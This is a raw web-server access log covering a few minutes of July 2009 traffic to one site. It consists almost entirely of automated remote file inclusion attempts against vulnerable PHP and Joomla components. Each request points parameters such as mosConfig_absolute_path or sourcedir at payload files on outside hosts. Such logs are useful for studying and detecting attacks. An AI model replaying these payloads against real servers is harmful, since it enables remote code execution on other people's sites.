66.11.230.36 - - [05/Jul/2009:07:50:47 -0700] "GET /logs/access_090619.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.1.215 - - [05/Jul/2009:07:51:01 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.1.215 - - [05/Jul/2009:07:51:01 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.puaga.com"
222.231.1.215 - - [05/Jul/2009:07:51:01 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:51:03 -0700] "GET /logs/access_090529.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:51:03 -0700] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:51:03 -0700] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:07:51:05 -0700] "GET /logs///common/db.php?commonpath=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:07:51:16 -0700] "GET /components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:07:51:16 -0700] "GET /logs/access_090603.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:07:51:16 -0700] "GET /logs//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:07:51:17 -0700] "GET /components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:07:51:17 -0700] "GET /logs/access_090603.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:07:51:17 -0700] "GET /logs/access_090603.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:07:51:17 -0700] "GET /components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:07:51:17 -0700] "GET /logs//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:07:51:17 -0700] "GET /logs//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:51:19 -0700] "GET /logs/access_090605.log/?sourcedir=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:51:19 -0700] "GET /logs/?sourcedir=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 200 4799 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:51:20 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:51:24 -0700] "GET /logs/access_090611.log/?sourcedir=http://fritzcomforthomes.com/idd.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:07:51:25 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:07:51:25 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:07:51:25 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:07:51:25 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:07:51:25 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:07:51:30 -0700] "GET /logs/access_090602.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:51:31 -0700] "GET /logs/access_090526.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:07:51:32 -0700] "GET /logs/access_090602.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:07:51:34 -0700] "GET /logs/access_090602.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:07:51:41 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:07:51:46 -0700] "GET /logs/access_090510.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:51:53 -0700] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:51:53 -0700] "GET /logs//prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:51:53 -0700] "GET /logs/access_090515.log//prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:07:51:54 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.0" 200 6109 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:07:52:07 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:07:52:07 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:52:09 -0700] "GET /logs/access_090615.log//prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:07:52:10 -0700] "GET /logs/access_090619.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.1.215 - - [05/Jul/2009:07:52:24 -0700] "GET /logs/access_090617.log///?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:07:52:36 -0700] "GET /logs/access_090606.log%20%20//oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:52:38 -0700] "GET /logs/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:52:38 -0700] "GET /logs/access_090605.log/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:52:38 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:52:46 -0700] "GET /logs/access_090605.log/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:52:46 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:52:46 -0700] "GET /logs/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 4799 "-" "libwww-perl/5.79" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:52:49 -0700] "GET /logs/access_090605.log/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:52:49 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:52:49 -0700] "GET /logs/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:52:49 -0700] "GET /logs/access_090605.log/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:52:50 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 6125 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:52:54 -0700] "GET /logs/access_090605.log/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:52:54 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 6125 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:53:01 -0700] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:53:03 -0700] "GET /logs//prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:53:03 -0700] "GET /logs/access_090515.log//prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:53:17 -0700] "GET /logs/access_090529.log/?DOCUMENT_ROOT=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:07:53:27 -0700] "GET /logs/access_090618.log////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:07:53:32 -0700] "GET /oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:07:53:32 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:07:53:33 -0700] "GET /logs/access_090624.log//oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:07:53:39 -0700] "GET /logs/access_090618.log////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:53:39 -0700] "GET /logs/access_090615.log//prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:07:53:43 -0700] "GET /logs/access_090616.log//oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:07:54:10 -0700] "GET /logs/access_090618.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:54:11 -0700] "GET /logs/access_090605.log/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:54:12 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:54:12 -0700] "GET /logs/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 4799 "-" "libwww-perl/5.805" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:54:20 -0700] "GET /logs/access_090515.log%20%20//prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.1.215 - - [05/Jul/2009:07:54:23 -0700] "GET /logs/access_090604.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:54:34 -0700] "GET /logs/access_090615.log%20%20//prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.230.9.68 - - [05/Jul/2009:07:55:12 -0700] "GET /logs/access_090524.log//include/print_category.php?setup[use_category]=1&dir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
222.231.1.215 - - [05/Jul/2009:07:55:18 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:55:19 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.805" "www.puaga.com"
66.46.177.182 - - [05/Jul/2009:07:55:27 -0700] "GET /logs/access_090610.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.puaga.com"
85.214.147.206 - - [05/Jul/2009:07:55:29 -0700] "GET /logs/access_090610.log//?_zb_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:55:37 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:55:37 -0700] "GET /logs/access_090515.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:55:37 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:55:42 -0700] "GET /logs/access_090525.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:07:55:42 -0700] "GET /logs/access_090610.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:55:46 -0700] "GET /logs/access_090515.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:55:46 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:55:47 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:55:52 -0700] "GET /logs/access_090525.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:55:55 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:55:55 -0700] "GET /logs/access_090515.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:55:55 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:07:55:59 -0700] "GET /logs/access_090525.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.46.177.182 - - [05/Jul/2009:07:56:09 -0700] "GET /logs/access_090610.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:56:17 -0700] "GET /?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.79" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:56:41 -0700] "GET /logs/access_090611.log/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
85.119.154.129 - - [05/Jul/2009:07:56:52 -0700] "GET /logs/access.log%20%20/index.php?binn_include_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.154.129 - - [05/Jul/2009:07:56:52 -0700] "GET /logs/index.php?binn_include_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.154.129 - - [05/Jul/2009:07:56:52 -0700] "GET /logs/access_090518.log%20%20/index.php?binn_include_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.154.129 - - [05/Jul/2009:07:56:53 -0700] "GET /index.php?binn_include_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:57:12 -0700] "GET /logs/access_090605.log%20%20/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:57:22 -0700] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:57:22 -0700] "GET /logs/access_090515.log//prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:57:22 -0700] "GET /logs//prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:07:57:23 -0700] "GET /logs/access_090611.log%20%20/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:07:57:27 -0700] "GET /logs/access_090611.log/?sourcedir=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.78.62.84 - - [05/Jul/2009:07:57:51 -0700] "GET /logs/access_090606.log//oneadmin/photogallery/include.php?path[docroot]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:07:58:04 -0700] "GET /logs/access_090615.log//prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:07:58:51 -0700] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:59:05 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:59:05 -0700] "GET /logs/access_090525.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:59:05 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:59:44 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:59:44 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:07:59:44 -0700] "GET /logs/access_090510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
